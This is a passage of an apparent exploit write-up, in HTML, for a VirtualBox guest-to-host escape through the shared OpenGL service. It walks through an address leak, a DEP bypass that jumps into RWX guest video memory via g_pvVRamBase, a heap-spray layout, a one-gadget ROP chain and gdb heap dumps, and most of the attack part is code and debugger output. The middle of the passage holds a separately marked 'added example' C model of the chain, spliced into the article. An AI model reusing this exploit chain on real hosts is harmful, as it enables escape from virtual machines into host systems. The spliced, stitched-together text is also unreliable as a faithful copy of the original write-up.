class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_SHORT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_UNSIGNED_SHORT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLshort<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_INT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_UNSIGNED_INT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLint<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line 
crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_FLOAT<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLfloat<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">case<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GL_DOUBLE<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">count *<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">GLdouble<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5b7b3e582f547537569397-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">default<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">crError<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Bad type in crServerDispatchGetChromiumParametervCR&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-30\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f547537569397-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">crServerReturnValue<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">local_storage<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">bytes<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f547537569397-33\"><span 
class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0063 seconds] -->  <\/p>\n<p><b>DEP Bypass<\/b><br \/> Not so difficult protection for this day. It might be enough to make a ROP chain but we have a quite scarce control of registers at the time of the vulnerable call [rax+320h], so I decided to search for another ways. It turned out that a host VirtualBox process has a memory region corresponding to guest video memory (VRAM) and its protection is RWX. If there is a pointer to VRAM in the host process, we could leak it using the information leak bug described above and transfer the control to VRAM where a shellcode written by our guest driver will be residing.<\/p>\n<p>Indeed, there is a global variable in \/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/server_main.c that stores an address of VRAM:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f553924442286\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div 
class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> uint8_t* g_pvVRamBase = NULL;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f553924442286-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f553924442286-1\"><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">g_pvVRamBase<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">NULL<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0006 seconds] -->  <\/p>\n<p>Moreover, server_main.c is a part of VBoxSharedCrOpenGL.so library which address can be 
easily leaked, and the variable itself is placed at the fixed offset from the libary.<\/p>\n<p>Thus to bypass DEP we leak VBoxSharedCrOpenGL.so address, add a fixed offset to it to obtain a pointer to g_pvVRamBase variable, and then force the host process to place the pointer in such way that later our ROP code will read a VRAM address from the pointer and will transfer the control to video memory. As we&#8217;ll see soon, just one ROP gadget is enough for that.<\/p>\n<p><b>Heap Spray<\/b><br \/> The last step is to spray the heap. We need to create many H3DORInstance-s following by a chunks with content controlled by us. To create a display I send VBOXCMDVBVA_FLIP command, as it does the WDDM driver. To allocate chunks of arbitrary content I send CR_PROGRAMNAMEDPARAMETER4DVNV_EXTEND_OPCODE command. This command accepting a buffer as an argument allocates memory and copies the buffer content to it, but doesn&#8217;t deallocates it even if the command is failed. I use this &#8220;feature&#8221; to pass the buffer of the following content:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f559284880773\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Offset 0x00: &lt;address-of-rop-gadget&gt;  Offset 0x08: &lt;address-of-g_pvVRamBase&gt;  Offset 0x10: &lt;address-of-rop-gadget&gt;  Offset 0x18: &lt;address-of-g_pvVRamBase&gt;  &#8230; and so on.<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f559284880773-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f559284880773-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f559284880773-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f559284880773-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f559284880773-5\">5<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; 
-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f559284880773-1\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x00<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rop<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f559284880773-2\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">g_pvVRamBase<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f559284880773-3\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">rop<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">gadget<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f559284880773-4\"><span class=\"crayon-i\">Offset<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-cn\">0x18<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">address<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">of<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">g_pvVRamBase<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f559284880773-5\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">so <\/span><span class=\"crayon-v\">on<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>As you can see, our buffers contain only two values. The first, a pointer to the rop gadget, is placed at addresses modulo 16, so one of them will be used in the vulnerable call command. 
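<\/p>\n<p>The two reads just described, the vulnerable call qword ptr [rax+320h] and the gadget mov rax,[rax+0x48]; mov rdi,rax; call [rax], modelled in plain C. This is an added example and not VirtualBox code or the author's exploit: the sprayed chunk is an ordinary array indexed by byte offset, the gadget and VRAM addresses are invented constants, and the 16-byte alignment of the pointer in rax (what malloc gives on x86-64) is an assumption, stated again in the code. It fills a chunk with the alternating layout above and emulates both dereferences, showing that every 16-byte-aligned landing point ends at the value of g_pvVRamBase, while an 8-byte-misaligned one breaks the chain.<\/p>\n

```c
/* Added example: a plain-C model of the one-gadget DEP bypass described in
 * this section. Not VirtualBox code and not the author's exploit. The
 * sprayed chunk is an array indexed by offset, so nothing real is corrupted,
 * and the gadget / VRAM addresses are invented. Assumes the pointer in rax
 * is 16-byte aligned, as a malloc chunk on x86-64 is. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Displacements taken from the two listings in this section. */
#define VULN_CALL_DISP   0x320u  /* call qword ptr [rax+320h]      */
#define GADGET_LOAD_DISP 0x48u   /* mov rax, QWORD PTR [rax+0x48]  */

#define SPRAY_QWORDS 256         /* 2 KiB of sprayed content (constructed) */

/* Invented stand-ins for the two leaked values. */
#define FAKE_GADGET_ADDR ((uintptr_t)0x7f8485c3c403ULL)  /* where the gadget lives */
#define FAKE_VRAM_BASE   ((uintptr_t)0x7f8400000000ULL)  /* what g_pvVRamBase holds */

/* Model of the host global uint8_t *g_pvVRamBase from server_main.c. Its
 * address is what the spray stores; its value is where control must land. */
static uintptr_t model_g_pvVRamBase = FAKE_VRAM_BASE;

/* Layout from the text: offsets 0 mod 16 hold the gadget address,
 * offsets 8 mod 16 hold the address of g_pvVRamBase. */
void fill_spray_chunk(uintptr_t *chunk, size_t nqwords)
{
    for (size_t i = 0; i < nqwords; i++)
        chunk[i] = (i % 2 == 0) ? FAKE_GADGET_ADDR
                                : (uintptr_t)&model_g_pvVRamBase;
}

/* One qword read at byte offset off inside the chunk; 0 when out of range. */
static uintptr_t read_qword(const uintptr_t *chunk, size_t nqwords, size_t off)
{
    uintptr_t v;
    if (off % sizeof v != 0 || off / sizeof v >= nqwords)
        return 0;
    memcpy(&v, (const uint8_t *)chunk + off, sizeof v);
    return v;
}

/* Vulnerable call site after mov rax,[rax]: rax points into the spray at
 * byte offset rax_off. Returns the address call qword ptr [rax+320h]
 * would transfer control to. */
uintptr_t emulate_vuln_call(const uintptr_t *chunk, size_t nqwords, size_t rax_off)
{
    return read_qword(chunk, nqwords, rax_off + VULN_CALL_DISP);
}

/* The gadget: mov rax,[rax+0x48]; mov rdi,rax; call [rax]. The call
 * instruction does not modify rax, so it still holds the same pointer into
 * the spray. Returns the final call target, or 0 if [rax+0x48] is not the
 * address of g_pvVRamBase (the real gadget would dereference garbage). */
uintptr_t emulate_gadget(const uintptr_t *chunk, size_t nqwords, size_t rax_off)
{
    uintptr_t p = read_qword(chunk, nqwords, rax_off + GADGET_LOAD_DISP);
    if (p != (uintptr_t)&model_g_pvVRamBase)
        return 0;
    return *(const uintptr_t *)p;   /* call [rax] -> *(&g_pvVRamBase), the VRAM base */
}

/* Whole chain for one landing point of rax. Returns the address control
 * ends up at: FAKE_VRAM_BASE when the layout works, 0 when it breaks. */
uintptr_t run_chain(size_t rax_off)
{
    static uintptr_t chunk[SPRAY_QWORDS];
    fill_spray_chunk(chunk, SPRAY_QWORDS);

    uintptr_t first = emulate_vuln_call(chunk, SPRAY_QWORDS, rax_off);
    if (first != FAKE_GADGET_ADDR)   /* [rax+0x320] must be a gadget slot */
        return 0;
    return emulate_gadget(chunk, SPRAY_QWORDS, rax_off);
}
```

<p>run_chain(0), run_chain(16) and any other multiple of 16 resolve to the VRAM base; run_chain(8) returns 0, because with rax at 8 modulo 16 the two values swap roles and the first call would target the address of g_pvVRamBase, a data pointer inside the library, instead of the gadget. That is the case to keep in mind if an allocator with only 8-byte alignment were ever in play.<\/p>\n<p>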
Recall the vulnerable call site:<\/p>\n<div id=\"crayon-5b7b3e582f55d613621684\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">.text:0000000000100DFF                 mov     rax, [rax]\n.text:0000000000100E02                 mov     rdi, [rdi+8]\n.text:0000000000100E06                 call    qword ptr [rax+320h]<\/textarea><\/div>\n<\/div>\n
<p>The second value, the address of g_pvVRamBase, sits at the offsets that are 8 modulo 16. The gadget the first call lands on reads [rax+0x48], and 0x48 is 8 modulo 16, so it loads exactly that address into rax (the call instruction itself leaves rax untouched, which is what keeps the two reads lined up); its final call [rax] then dereferences g_pvVRamBase and transfers control into VRAM, where the guest driver has placed the shellcode:<\/p>\n
<div id=\"crayon-5b7b3e582f561304566284\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">gef\u27a4  x\/3i $pc\n=&gt; 0x7f8485c3c403:\tmov    rax,QWORD PTR [rax+0x48]\n   0x7f8485c3c407:\tmov    rdi,rax\n   0x7f8485c3c40a:\tcall   QWORD PTR [rax]<\/textarea><\/div>\n<\/div>\n
<p>To summarize, the heap layout at the time of the vulnerable call looks like this:<\/p>\n
<div id=\"crayon-5b7b3e582f565861393961\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\"
data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> gef\u27a4  x\/128gx $rax  0x7f83cfd4f2e0:\t0x00007f8485c3c403\t0x0000000000000035  0x7f83cfd4f2f0:\t0x00007f83cf0c2000\t0x00007f83cfd50d70  0x7f83cfd4f300:\t0x0000000000000000\t0x0000029b00000556  0x7f83cfd4f310:\t0x0000000000010101\t0x0000000000000305  0x7f83cfd4f320:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f330:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f340:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f350:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f360:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f370:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f380:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f390:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3a0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3b0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3c0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3d0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3e0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f3f0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f400:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f410:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f420:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f430:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f440:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f450:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f460:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f470:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f480:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f490:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4a0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4b0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4c0:\t0x00007f8485c3c403\t0x00007f849fff1650  
0x7f83cfd4f4d0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4e0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f4f0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f500:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f510:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f520:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f530:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f540:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f550:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f560:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f570:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f580:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f590:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5a0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5b0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5c0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5d0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5e0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f5f0:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f600:\t0x00007f8485c3c403\t0x00007f849fff1650  0x7f83cfd4f610:\t0x00007f8485c3c403\t0x0000000000000025  0x7f83cfd4f620:\t0x00007f83cfd4f940\t0x00007f83cfd4e020  